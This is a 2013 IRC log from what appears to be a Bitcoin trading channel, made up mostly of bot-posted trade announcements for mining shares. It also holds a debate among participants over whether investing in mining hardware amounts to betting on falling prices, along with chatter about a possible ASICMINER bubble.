yeah, that was awesome May 19 22:50:16 how can that be awesome hes a scammer May 19 22:50:33 the musical performance was awesome May 19 22:50:33 [BTCTC] [ASICMINER-PT] 2 @ 2.088 = 4.176 BTC [-] May 19 22:51:48 [BTCTC] [ASICMINER-PT] 2 @ 2.089 = 4.178 BTC [+] May 19 22:52:12 cause of all the "boooo"'s ? May 19 22:52:18 [BTCTC] [ASICMINER-PT] 3 @ 2.08996 = 6.2699 BTC [+] May 19 22:53:32 who's there? May 19 22:53:38 [BTCTC] [ASICMINER-PT] 24 @ 2.08 = 49.92 BTC [-] May 19 22:53:41 pizzaman May 19 22:54:09 [BTCTC] [ASICMINER-PT] 9 @ 2.08999 = 18.8099 BTC [+] May 19 22:54:43 [BTCTC] [ASICMINER-PT] 28 @ 2.09 = 58.52 BTC [+] May 19 22:55:04 [BTCTC] [ASICMINER-PT] 1 @ 2.09 BTC [+] May 19 23:00:05 [MPEX] [S.MPOE] 6921 @ 0.00070126 = 4.8534 BTC [-] May 19 23:00:10 [MPEX] [S.MPOE] 8753 @ 0.00070121 = 6.1377 BTC [-] May 19 23:00:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.020301 = 0.203 BTC [-] May 19 23:00:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0203 BTC [-] May 19 23:05:52 ("ZhouTonged" as in this group: http://www.youtube.com/watch?v=yc6Hp_Zq3rU ) May 19 23:07:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.019751 = 0.0988 BTC [-] May 19 23:07:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.019751 BTC [-] May 19 23:10:04 [HAVELOCK] [ASICM] 21 @ 0.02 = 0.42 BTC [+] May 19 23:11:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.019751 BTC [-] May 19 23:13:41 [BTCTC] [COGNITIVE] 1 @ 0.235 BTC [+] May 19 23:22:03 [HAVELOCK] [VTX] 8 @ 0.4113 = 3.2904 BTC [-] May 19 23:23:04 [HAVELOCK] [ASICM] 1 @ 0.020148 BTC [+] May 19 23:27:06 [BTCTC] [ASICMINER-PT] 1 @ 2.064201 BTC [-] May 19 23:27:42 [BTCTC] [ASICMINER-PT] 1 @ 2.099 BTC [+] May 19 23:27:54 [BTCTC] [ASICMINER-PT] 3 @ 2.099 = 6.297 BTC [+] May 19 23:29:03 [HAVELOCK] [ASICM] 30 @ 0.020149 = 0.6045 BTC [+] May 19 23:31:48 [BTCTC] [ASICMINER-PT] 4 @ 2.1 = 8.4 BTC [+] May 19 23:35:25 LOL just bought a bunch on btc-e for $111.50 May 19 23:35:57 ;;ticker May 19 23:35:57 BTCUSD ticker | Best bid: 120.50210, Best ask: 121.00000, Bid-ask spread: 0.49790, Last trade: 121.00000, 24 hour volume: 20083.67566340, 24 hour low: 119.50000, 24 hour high: 124.50101, 24 hour vwap: 121.95940 May 19 23:36:56 [BTCTC] [GSDPT] 20 @ 0.00273 = 0.0546 BTC [-] May 19 23:38:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.020749 = 0.2075 BTC [+] May 19 23:39:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.020749 = 0.415 BTC [+] May 19 23:40:04 [HAVELOCK] [ASICM] 30 @ 0.02051 = 0.6153 BTC [+] May 19 23:41:44 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [+] May 19 23:42:04 [HAVELOCK] [ASICM] 14 @ 0.02051 = 0.2871 BTC [+] May 19 23:43:25 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [+] May 19 23:45:16 [BTCTC] [ASICMINER-PT] 1 @ 2.1678 BTC [+] May 19 23:47:34 ^ May 19 23:47:36 yeesh May 19 23:47:42 [BTCTC] [ASICMINER-PT] 1 @ 2.1679 BTC [+] May 19 23:48:04 [HAVELOCK] [VTX] 1 @ 0.4113 BTC [-] May 19 23:50:10 [BTCTC] [ASICMINER-PT] 5 @ 2.1679 = 10.8395 BTC [+] May 19 23:53:03 [HAVELOCK] [VTX] 2 @ 0.4113 = 0.8226 BTC [-] May 19 23:53:44 [BTCTC] [ASICMINER-PT] 2 @ 2.1699 = 4.3398 BTC [+] May 19 23:54:03 [HAVELOCK] [ASICM] 30 @ 0.02 = 0.6 BTC [-] May 19 23:55:23 [BTCTC] [S.DICE-PT] 9 @ 0.00274 = 0.0247 BTC [+] May 19 23:55:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.019812 = 0.1981 BTC [-] May 19 23:57:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.019812 = 0.0991 BTC [-] May 19 23:58:29 lol: https://bitcointalk.org/index.php?topic=80312.msg2203764#msg2203764 May 19 23:58:44 Dooglus: "good news: whale is back May 19 23:58:44 bad news: he's kicking our ass" May 19 23:58:51 [BTCTC] [ASICMINER-PT] 1 @ 2.149512 BTC [-] May 19 23:59:11 [BTCTC] [ASICMINER-PT] 4 @ 2.15 = 8.6 BTC [+] May 19 23:59:19 ftw http://i.imgur.com/ZmHekEI.png May 19 23:59:27 [MPEX] [S.MPOE] 15839 @ 0.00070121 = 11.1065 BTC [-] May 19 23:59:49 [BTCTC] [ASICMINER-PT] 1 @ 2.149512 BTC [-] May 20 00:00:03 [HAVELOCK] [ASICM] 2 @ 0.02 = 0.04 BTC [-] May 20 00:00:31 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [+] May 20 00:01:24 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [+] May 20 00:01:43 [BTCTC] [ASICMINER-PT] 4 @ 2.1699 = 8.6796 BTC [+] May 20 00:02:12 [BTCTC] [ASICMINER-PT] 1 @ 2.1699 BTC [+] May 20 00:02:32 [BTCTC] [ASICMINER-PT] 5 @ 2.1699 = 10.8495 BTC [+] May 20 00:04:08 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [-] May 20 00:04:31 [BTCTC] [BITVPS] 1 @ 0.000697 BTC [-] May 20 00:05:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.020444 = 0.1022 BTC [+] May 20 00:06:07 [BTCTC] [ASICMINER-PT] 1 @ 2.100002 BTC [-] May 20 00:06:32 [BTCTC] [ASICMINER-PT] 1 @ 2.100001 BTC [-] May 20 00:06:47 [BTCTC] [ASICMINER-PT] 110 @ 2.1 = 231 BTC [-] May 20 00:08:12 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [+] May 20 00:08:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.020749 = 0.2075 BTC [+] May 20 00:08:42 [BTCTC] [TAT.ASICMINER] 95 @ 0.02075 = 1.9713 BTC [+] May 20 00:08:58 [BTCTC] [TAT.ASICMINER] 95 @ 0.020852 = 1.9809 BTC [+] May 20 00:10:47 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [+] May 20 00:13:35 [BTCTC] [TAT.ASICMINER] 25 @ 0.0209 = 0.5225 BTC [+] May 20 00:14:02 [BTCTC] [TAT.ASICMINER] 34 @ 0.020985 = 0.7135 BTC [+] May 20 00:20:42 [MPEX] [S.MPOE] 1639 @ 0.00070121 = 1.1493 BTC [-] May 20 00:20:44 [MPEX] [S.MPOE] 18700 @ 0.00070043 = 13.098 BTC [-] May 20 00:20:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.020447 = 0.2045 BTC [-] May 20 00:20:55 [MPEX] [S.MPOE] 2711 @ 0.00070043 = 1.8989 BTC [-] May 20 00:23:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.020984 BTC [+] May 20 00:23:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.196 BTC [-] May 20 00:23:17 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1976 = 0.5928 BTC [+] May 20 00:23:21 [BTCTC] [CRYPTO-TRADE] 7 @ 0.198 = 1.386 BTC [+] May 20 00:28:08 [BTCTC] [TAT.ASICMINER] 9 @ 0.020447 = 0.184 BTC [-] May 20 00:30:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.020446 = 0.4089 BTC [-] May 20 00:33:17 [BTCTC] [ASICMINER-PT] 1 @ 2.100001 BTC [-] May 20 00:33:33 [BTCTC] [ASICMINER-PT] 10 @ 2.1 = 21 BTC [-] May 20 00:33:48 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] May 20 00:34:04 [HAVELOCK] [SDICE] 1 @ 0.2354 BTC [-] May 20 00:37:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.020444 BTC [-] May 20 00:53:46 [BTCTC] [COGNITIVE] 1 @ 0.210011 BTC [-] May 20 00:59:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.02001 = 0.1001 BTC [-] May 20 01:00:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02001 BTC [-] May 20 01:01:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [-] May 20 01:02:55 [BTCTC] [ASICMINER-PT] 1 @ 2.025 BTC [-] May 20 01:04:01 [BTCTC] [ASICMINER-PT] 1 @ 2.025 BTC [-] May 20 01:07:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.020967 = 0.2097 BTC [+] May 20 01:09:48 [BTCTC] [COGNITIVE] 1 @ 0.234999 BTC [+] May 20 01:11:56 [BTCTC] [TAT.ASICMINER] 17 @ 0.020968 = 0.3565 BTC [+] May 20 01:31:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.020101 = 0.1608 BTC [-] May 20 01:31:49 [BTCTC] [TAT.ASICMINER] 85 @ 0.0201 = 1.7085 BTC [-] May 20 01:32:08 [BTCTC] [TAT.ASICMINER] 9 @ 0.02 = 0.18 BTC [-] May 20 01:38:47 [BTCTC] [ASICMINER-PT] 1 @ 2.148994 BTC [+] May 20 01:39:01 [MPEX] [S.MPOE] 15300 @ 0.00070155 = 10.7337 BTC [+] May 20 01:39:03 [MPEX] [S.MPOE] 4321 @ 0.00070352 = 3.0399 BTC [+] May 20 01:39:05 [MPEX] [S.MPOE] 4800 @ 0.00070374 = 3.378 BTC [+] May 20 01:39:06 [MPEX] [S.MPOE] 629 @ 0.00070374 = 0.4427 BTC [+] May 20 01:39:37 [BTCTC] [ASICMINER-PT] 1 @ 2.14789 BTC [-] May 20 01:39:52 [BTCTC] [ASICMINER-PT] 1 @ 2.149 BTC [+] May 20 01:40:11 [BTCTC] [ASICMINER-PT] 1 @ 2.14787 BTC [-] May 20 01:47:18 [BTCTC] [ASICMINER-PT] 1 @ 2.148752 BTC [+] May 20 01:47:24 [BTCTC] [ASICMINER-PT] 3 @ 2.149 = 6.447 BTC [+] May 20 01:47:52 [BTCTC] [ASICMINER-PT] 4 @ 2.149 = 8.596 BTC [+] May 20 01:48:08 [BTCTC] [ASICMINER-PT] 5 @ 2.148512 = 10.7426 BTC [-] May 20 01:48:19 [BTCTC] [ASICMINER-PT] 3 @ 2.15 = 6.45 BTC [+] May 20 01:50:04 [HAVELOCK] [ASICM] 10 @ 0.020478 = 0.2048 BTC [+] May 20 01:50:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.020967 = 0.1677 BTC [+] May 20 01:50:39 [BTCTC] [TAT.ASICMINER] 500 @ 0.020967 = 10.4835 BTC [+] May 20 01:51:47 [BTCTC] [TAT.ASICMINER] 33 @ 0.020968 = 0.6919 BTC [+] May 20 01:52:11 [HAVELOCK] [ASICM] 2 @ 0.020479 = 0.041 BTC [+] May 20 01:52:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.020985 = 0.2099 BTC [+] May 20 01:53:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.020984 = 0.1679 BTC [-] May 20 01:53:06 [HAVELOCK] [ASICM] 15 @ 0.020479 = 0.3072 BTC [+] May 20 01:53:11 [BTCTC] [TAT.ASICMINER] 479 @ 0.021152 = 10.1318 BTC [+] May 20 01:54:04 [HAVELOCK] [ASICM] 30 @ 0.02049 = 0.6147 BTC [+] May 20 01:55:45 [BTCTC] [TAT.ASICMINER] 21 @ 0.021152 = 0.4442 BTC [+] May 20 01:55:50 [BTCTC] [TAT.ASICMINER] 512 @ 0.021252 = 10.881 BTC [+] May 20 01:55:55 [BTCTC] [TAT.ASICMINER] 500 @ 0.02133 = 10.665 BTC [+] May 20 01:55:59 [BTCTC] [TAT.ASICMINER] 70 @ 0.021352 = 1.4946 BTC [+] May 20 01:58:04 [HAVELOCK] [ASICM] 25 @ 0.02094512 = 0.5236 BTC [+] May 20 01:59:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.02121 = 0.2121 BTC [-] May 20 02:00:50 [BTCTC] [TAT.ASICMINER] 60 @ 0.0214 = 1.284 BTC [+] May 20 02:04:05 [HAVELOCK] [ASICM] 30 @ 0.02094 = 0.6282 BTC [-] May 20 02:04:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0214 BTC [+] May 20 02:05:05 [HAVELOCK] [ASICM] 2 @ 0.02094512 = 0.0419 BTC [+] May 20 02:05:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0214 BTC [+] May 20 02:06:04 [HAVELOCK] [ASICM] 100 @ 0.02094512 = 2.0945 BTC [+] May 20 02:12:22 [BTCTC] [ASICMINER-PT] 2 @ 2.15 = 4.3 BTC [+] May 20 02:14:11 [BTCTC] [TAT.ASICMINER] 17 @ 0.021396 = 0.3637 BTC [-] May 20 02:15:05 [HAVELOCK] [ASICM] 250 @ 0.020498 = 5.1245 BTC [-] May 20 02:15:05 [HAVELOCK] [ASICM] 20 @ 0.020479 = 0.4096 BTC [-] May 20 02:15:06 [HAVELOCK] [ASICM] 12 @ 0.0204 = 0.2448 BTC [-] May 20 02:20:04 [HAVELOCK] [ASICM] 1 @ 0.02093982 BTC [+] May 20 02:22:32 inventing a time machine atm May 20 02:22:46 to stop myself from selling asicminer shares at ~1.3 May 20 02:23:55 dude May 20 02:23:59 dont sweat it May 20 02:24:11 new favorite quote "nobody ever went broke taking a profit" May 20 02:24:19 [BTCTC] [B.YABMC] 5 @ 0.016739 = 0.0837 BTC [-] May 20 02:24:21 on that note, i still have all my shares :p May 20 02:25:05 nobody ever went broke selling for more than savetheinternet did **** ENDING LOGGING AT Mon May 20 02:47:28 2013 **** BEGIN LOGGING AT Mon May 20 09:47:11 2013 May 20 09:47:20 ;;ticker May 20 09:47:21 BTCUSD ticker | Best bid: 121.93086, Best ask: 122.78688, Bid-ask spread: 0.85602, Last trade: 121.89291, 24 hour volume: 24445.74160237, 24 hour low: 119.50000, 24 hour high: 124.50101, 24 hour vwap: 121.80684 May 20 09:47:41 [BTCTC] [ASICMINER-PT] 1 @ 2.011001 BTC [-] May 20 09:47:46 [BTCTC] [ASICMINER-PT] 1 @ 2.011 BTC [-] May 20 09:47:47 I updated my article on why Mining investments is always a bet that prices will drop. Added a new question: http://coin.furuknap.net/why-investing-in-mining-is-always-a-bet-that-prices-will-drop/ May 20 09:47:59 [BTCTC] [ASICMINER-PT] 1 @ 2.0101 BTC [-] May 20 09:49:18 Can't really argue against math, but damn, people keep trying. May 20 09:49:50 i don't think that's very well presented. May 20 09:50:03 What isn't? May 20 09:50:09 while its true that for any purchase of mining hardware there's a price point where it becomes unprofitable, May 20 09:50:19 [BTCTC] [BASIC-MINING] 8 @ 0.49 = 3.92 BTC [+] May 20 09:50:20 it's nevertheless not exactly true that buying gear is a bet on price dropping. May 20 09:51:04 [BTCTC] [BASIC-MINING] 4 @ 0.5 = 2 BTC [+] May 20 09:51:12 The article shows that a dropping price always yields a much higher profit than mining. May 20 09:51:23 *than mining alone May 20 09:51:58 let's put it this way : it's true that a slut is a much better catch than a priss on any blind dating sit down May 20 09:52:08 [HAVELOCK] [ASICM] 2 @ 0.021512 = 0.043 BTC [+] May 20 09:52:13 nevertheless, it doesn't follow that people going on blind dates are betting on sluts. May 20 09:53:37 That's not the argument from the article either. In fact, it's the exact opposite, because you're bringing your own dame to the party :-) May 20 09:53:56 o boy. May 20 09:54:28 Well, that's fine too, if you swing in that direction... May 20 09:54:37 :-) May 20 09:55:14 is buying a cup of coffee in the morning a bet that fiat will collapse by noon ? May 20 09:55:41 If you can resell it at noon and fiat will rise again, yes. May 20 09:56:28 [MPEX] [S.MPOE] 9347 @ 0.00069867 = 6.5305 BTC [+] May 20 09:56:43 yeah well, that's the problem. May 20 09:57:18 Please elaborate. May 20 09:58:09 [HAVELOCK] [ASICM] 5 @ 0.0215 = 0.1075 BTC [-] May 20 09:58:11 [HAVELOCK] [ASICM] 28 @ 0.021512 = 0.6023 BTC [+] May 20 09:58:15 you've come up with an edge case and are phrasing the situation in terms of that edge case. May 20 09:58:29 it's still an edge case. May 20 09:59:24 [MPEX] [S.MPOE] 8373 @ 0.00069772 = 5.842 BTC [-] May 20 09:59:26 [MPEX] [S.MPOE] 2792 @ 0.00069733 = 1.9469 BTC [-] May 20 09:59:31 You mean by using unrealistic numbers? The case presented is intended to simplify the scenario because it is easier to see when you don't need to argue with stuff like "well, my postage is cheap so selling yields more profit than that" etc. May 20 10:00:39 no, i don't mean by using unrelisting numbers. May 20 10:01:02 Then I'm not following you. May 20 10:01:25 yeah. May 20 10:04:08 [HAVELOCK] [ASICM] 100 @ 0.021512 = 2.1512 BTC [+] May 20 10:05:08 is getting married a bet that your wife-to-be has an unknown uncle in argentina who will leave her a billion dollar inheritance ? May 20 10:05:09 [HAVELOCK] [ASICM] 5 @ 0.0211 = 0.1055 BTC [-] May 20 10:05:10 [HAVELOCK] [ASICM] 10 @ 0.021 = 0.21 BTC [-] May 20 10:07:00 No? Definitely not sure I'm following you, unless you're talking about a wife being a commodity that can be resold at a lower price point and you have to pay to get her. May 20 10:07:21 ok. inasmuch as getting married isn;t a bet on some contingent future event May 20 10:07:33 buying mining gear isn't a bet on some contingent future event. May 20 10:08:17 That doesn't follow at all. Getting married is not an investment that can be resold. May 20 10:08:56 that's an irrelevant difference. May 20 10:09:00 Mining equipment is such a commodity. In fact, that's why I used the currency trick in the first section. May 20 10:09:24 but May 20 10:09:25 hrm May 20 10:09:33 you can prett ymuch promise that mining rewards will go down May 20 10:09:57 i can't discern if your motivation is to understand what you did wrong or to show the world how clever you are. which is it ? May 20 10:10:36 I'm trying to understand what I did wrong, definitely. Talking about getting married as an investment doesn't do that. May 20 10:11:00 inhies: Mining isn't actually part of the scenario at all, but is elaborated in the questions at the end. May 20 10:11:05 ok. any one thing, no matter what thing you pick, has some directly connected bits and some contingent bits. May 20 10:11:07 furuknap: yea i see May 20 10:11:09 [HAVELOCK] [ASICM] 10 @ 0.0208 = 0.208 BTC [-] May 20 10:11:10 [HAVELOCK] [ASICM] 15 @ 0.0207 = 0.3105 BTC [-] May 20 10:11:11 [HAVELOCK] [ASICM] 299 @ 0.0206 = 6.1594 BTC [-] May 20 10:11:26 as far as mining is concerned, difficulty is directly connected. the btc/fiat rate is contingent. May 20 10:11:37 True. May 20 10:11:45 okay. May 20 10:12:15 presenting any definite activity in terms of it being "A bet on X arbitrary contingency" is a peculiar and not particularly useful manner of speech. May 20 10:12:38 furuknap: i see teh problem May 20 10:12:44 you could as well say that buying mining gear is a bet on the aliens showing up and wanting to buy it for infinite money. May 20 10:12:52 your blog post is not well presented because mircea_popescu didn't write it May 20 10:14:46 Ah, you're arguing about the wording. That's fine. The article is trying to show that in the case of a price drop, a miner gains more coins by holding gear. Difficulty isn't relevant here because mining isn't part of the equation. May 20 10:15:21 well, you seemed to interested to know why people are throwing a fit avbout it. May 20 10:15:36 Yup, I get what you're saying about that :-) May 20 10:15:39 it's the wording. any one miner knows he's not betting on THAT. so you'll get a lot of misdirected protestation May 20 10:15:58 othe rthan that, sure, btc going up actually hurts mining investments. May 20 10:16:14 inasmuch as the mining rigs are fiat items pretty much. May 20 10:18:08 [HAVELOCK] [ASICM] 12 @ 0.0205 = 0.246 BTC [-] May 20 10:18:33 I see. I'm fine with using provocative wording to cause a reaction. People tend to remember (if not agree) with statements that strongly contradict their perception of reality. May 20 10:19:32 this is true, and i do it all the time myself. May 20 10:19:52 nevertheless, it helps if you contradict something germane to the issue rather than something random, i think. May 20 10:21:52 I'm not sure it is as random as that. I wrote the article based on a lot of questions asked on the Reddit forums and people universally tended to completely ignore the effect of price fluctuations of their gear. One miner had just bought around 50 GPUs and hadn't realized that when the price of LTC dropped, he actually earned more from just having that gear than from mining. May 20 10:23:10 this may also be true. May 20 10:23:39 truth of the matter is miners are so far away from any sort of financial understanding it's probably wasted effort to debate which of their dumbass notions should be contradicted etc. May 20 10:24:08 [HAVELOCK] [ASICM] 512 @ 0.0205 = 10.496 BTC [-] May 20 10:24:10 incidentally, this may interest : http://trilema.com/2013/how-to-hedge-as-a-miner/ May 20 10:24:39 it certainly wasn't well presented seeing how nobody got it at the time. May 20 10:24:47 [MPEX] [S.MPOE] 21200 @ 0.00069571 = 14.7491 BTC [-] May 20 10:25:17 That is, and I'm not joking, the topic of my next article :-) Miners have a limited understanding of finance, just as financial people have a limited understanding of mining. When I talk to miners, they seem to argue that "just holding coins is really bad if the price drops while a miner can always resell his hardware" and not understanding anything about hedges in finance. May 20 10:26:07 myeah. that's why i've made the futures etc. May 20 10:26:28 really slow uptake. i guess that's what you get when something starts as a hobbist market : hobbists. May 20 10:26:45 When I talk to financial people, they tend to argue that "well, buying hardware is so much of a hassle, and what if it breaks? You're left with nothing!" not realizing how a miner with some hardwre competence can fix or replace hardware as easily as they purchase an option or future. May 20 10:27:08 nobody's fixing much of asics, but anyway. May 20 10:29:08 [HAVELOCK] [ASICM] 5 @ 0.0214 = 0.107 BTC [+] May 20 10:29:13 [BTCTC] [ASICMINER-PT] 1 @ 2.059999 BTC [+] May 20 10:29:58 ASICs is a specialized piece of hardware that doesn't really have any resell value after a relatively short time. GPUs on the other hand has resale value, can be fixed, tuned, and easily replaced, and in some cases, it can even make sense to have a few spares laying around because unused cards don't depreciate much and thus isn't an asset cost. May 20 10:31:13 sure. May 20 10:36:04 Have you considered adding futures and options on LTC too? May 20 10:36:56 not really. May 20 10:38:28 A lot of mining operations popping up on LTC now could greatly benefit from hedging against price fluctuations. A fund that does LTC mining combined with a sound hedging strategy could really make a killing. May 20 10:39:03 i'm a monomaniac sort of guy. i idle in one irc channel only. i handle one cryptocurrency only. May 20 10:39:14 if i ever list ltc it will be because i'm moving off btc. May 20 10:39:42 I understand. Maybe someone else will jump on it, then :-) May 20 10:39:50 [BTCTC] [ASICMINER-PT] 1 @ 2.111 BTC [+] May 20 10:40:16 [BTCTC] [ASICMINER-PT] 1 @ 2.1344 BTC [+] May 20 10:40:43 [BTCTC] [ASICMINER-PT] 1 @ 2.13483 BTC [+] May 20 10:41:02 [BTCTC] [ASICMINER-PT] 13 @ 2.13484 = 27.7529 BTC [+] May 20 10:41:22 [BTCTC] [ASICMINER-PT] 3 @ 2.139491 = 6.4185 BTC [+] May 20 10:41:46 [BTCTC] [ASICMINER-PT] 3 @ 2.146 = 6.438 BTC [+] May 20 10:41:49 [BTCTC] [ASICMINER-PT] 5 @ 2.146 = 10.73 BTC [+] May 20 10:42:18 [BTCTC] [ASICMINER-PT] 3 @ 2.1485 = 6.4455 BTC [+] May 20 10:42:46 [BTCTC] [ASICMINER-PT] 9 @ 2.15 = 19.35 BTC [+] May 20 10:43:33 [BTCTC] [ASICMINER-PT] 1 @ 2.16999 BTC [+] May 20 10:43:38 [BTCTC] [ASICMINER-PT] 5 @ 2.16999 = 10.85 BTC [+] May 20 10:44:57 [BTCTC] [ASICMINER-PT] 1 @ 2.1795 BTC [+] May 20 10:45:02 [BTCTC] [ASICMINER-PT] 5 @ 2.1795 = 10.8975 BTC [+] May 20 10:45:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.02085 = 0.1668 BTC [+] May 20 10:45:44 [BTCTC] [ASICMINER-PT] 5 @ 2.1798 = 10.899 BTC [+] May 20 10:45:48 [BTCTC] [ASICMINER-PT] 11 @ 2.1798 = 23.9778 BTC [+] May 20 10:46:05 Geez-us. May 20 10:46:26 to the moon! May 20 10:46:32 [BTCTC] [ASICMINER-PT] 23 @ 2.1799 = 50.1377 BTC [+] May 20 10:46:50 This isn't going to end well... May 20 10:46:54 noep May 20 10:46:56 lol May 20 10:47:00 lots of auctions May 20 10:47:09 people want out of the bubble now May 20 10:48:23 [BTCTC] [ASICMINER-PT] 10 @ 2.1799 = 21.799 BTC [+] May 20 10:48:56 I hope this buyer has a lot of spare money and really, really doesn't mind losing it. May 20 10:49:19 so basically you hope asicminer gets whales too May 20 10:49:38 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [+] May 20 10:49:41 Actually, I hope this buyer doesn't get burned more than they can survive. May 20 10:51:22 furuknap: what's the difference saying that at 2.0 rather than 1.0 other than psychology? May 20 10:52:08 The major difference is that there is no fundamental value of AM to support such a high price. At 1.0, the value is higher than the price. At 2.0 the price is higher than the value. May 20 10:52:45 i don't see it. May 20 10:52:52 ASICMINER was discussed at one of the panels at bitcoin2013 earlier today, this could be a VC getting around to dumping some money in May 20 10:53:06 Most likely, the thing that has driven the price up 0.7 in the previous coupld of weeks is that people see the huge dividends, which cannot possibly continue. May 20 10:53:11 pizzaman1337 yeah, in pt shares. i see it /sarcasm May 20 10:53:25 "VC" May 20 10:53:28 furuknap i'll tell you what has driven the price : May 20 10:53:41 there's a crowd of idiots who want to invest in-crowd. May 20 10:53:48 It could very well be that someone overheard that a VC might enter and thought the tender would be higher than market. May 20 10:53:53 the good news is that back in 2011 they had about 2mn btc, then in 2012 they had about 100k May 20 10:54:01 and by now they're stuck with about 10k or so May 20 10:54:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.02085 = 0.1043 BTC [+] May 20 10:54:34 Oh, I know. The herd thing is dangerous. I just hope it doesn't taint BTC assets in general as bubble shares. I fear the train may have left for AM. May 20 10:54:54 you're talking to the one guy who prevented that back when it actually had a chance. May 20 10:54:57 i wouldn't worry by now. May 20 10:55:43 I worry because others are greedy. I try to be greedy when others worry. May 20 10:55:53 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [+] May 20 10:56:22 furuknap: i like that quote May 20 10:56:32 the actual quote though, not your version :p May 20 10:56:49 "My partner and I had reservations for 6:45. By 9:30, we still hadn't received our pizza." May 20 10:56:50 Heh, good ole WB has a lot of things right. May 20 10:56:50 bwahaha May 20 10:56:58 [BTCTC] [ASICMINER-PT] 2 @ 1.6 = 3.2 BTC [-] May 20 10:57:08 [MPEX] [S.MPOE] 5000 @ 0.0006839 = 3.4195 BTC [-] May 20 10:57:16 Assbot really need to show options in a special way. May 20 10:58:02 [BTCTC] [ASICMINER-PT] 1 @ 2.179999 BTC [+] May 20 10:59:33 [BTCTC] [ASICMINER-PT] 1 @ 1.6 BTC [-] May 20 11:04:36 [MPEX] [S.MPOE] 7004 @ 0.00068075 = 4.768 BTC [-] May 20 11:12:09 [HAVELOCK] [ASICM] 10 @ 0.0214 = 0.214 BTC [+] May 20 11:12:11 [MPEX] [S.MPOE] 9800 @ 0.00067 = 6.566 BTC [-] May 20 11:20:03 [BTCTC] [RSM] 5 @ 0.014999 = 0.075 BTC [+] May 20 11:22:32 [BTCTC] [TAT.ASICMINER] 110 @ 0.02085 = 2.2935 BTC [+] May 20 11:22:37 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [+] May 20 11:22:43 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [+] May 20 11:24:12 [BTCTC] [ASICMINER-PT] 3 @ 1.6 = 4.8 BTC [-] **** BEGIN LOGGING AT Mon May 20 15:32:51 2013 May 20 15:33:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.021 BTC [+] May 20 15:40:00 [BTCTC] [PAJKA.BOND] 1 @ 0.10899 BTC [+] May 20 15:41:33 Is it safe to eat two day old bread? if there's mold, be bold! May 20 15:45:04 [MPEX] [S.MPOE] 26553 @ 0.00067195 = 17.8423 BTC [+] May 20 15:51:43 the most you'll get is a little high, if it's rye May 20 15:52:09 [BTCTC] [BASIC-MINING] 4 @ 0.5 = 2 BTC [+] May 20 15:52:57 [BTCTC] [BITVPS] 2 @ 0.000696 = 0.0014 BTC [-] May 20 15:53:49 two day old bread? May 20 15:53:53 are you kidding? May 20 15:54:36 that's basically fresh May 20 15:56:50 [BTCTC] [ASICMINER-PT] 1 @ 2.17 BTC [+] May 20 15:56:54 [BTCTC] [ASICMINER-PT] 1 @ 2.1748 BTC [+] May 20 15:56:59 [BTCTC] [ASICMINER-PT] 1 @ 2.174899 BTC [+] May 20 15:57:03 [BTCTC] [ASICMINER-PT] 1 @ 2.1749 BTC [+] May 20 15:57:07 [BTCTC] [ASICMINER-PT] 3 @ 2.174997 = 6.525 BTC [+] May 20 15:57:11 [BTCTC] [ASICMINER-PT] 3 @ 2.174998 = 6.525 BTC [+] May 20 15:57:34 depends in what conditions was that bread May 20 15:58:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.021494 = 0.129 BTC [+] May 20 15:59:29 [MPEX] [S.MPOE] 5937 @ 0.0006706 = 3.9814 BTC [-] May 20 15:59:31 [MPEX] [S.MPOE] 3386 @ 0.00067059 = 2.2706 BTC [-] May 20 16:00:40 [BTCTC] [TAT.ASICMINER] 46 @ 0.021495 = 0.9888 BTC [+] May 20 16:00:46 [BTCTC] [TAT.ASICMINER] 65 @ 0.021499 = 1.3974 BTC [+] May 20 16:00:50 [BTCTC] [TAT.ASICMINER] 250 @ 0.021499 = 5.3748 BTC [+] May 20 16:01:00 [BTCTC] [TAT.ASICMINER] 70 @ 0.021511 = 1.5058 BTC [+] May 20 16:01:05 [BTCTC] [TAT.ASICMINER] 200 @ 0.021511 = 4.3022 BTC [+] May 20 16:01:08 nothing like a halluciogenic trip before your feet rot off. May 20 16:01:10 [BTCTC] [TAT.ASICMINER] 198 @ 0.021595 = 4.2758 BTC [+] May 20 16:01:21 ;;google ergotism May 20 16:01:22 Ergotism 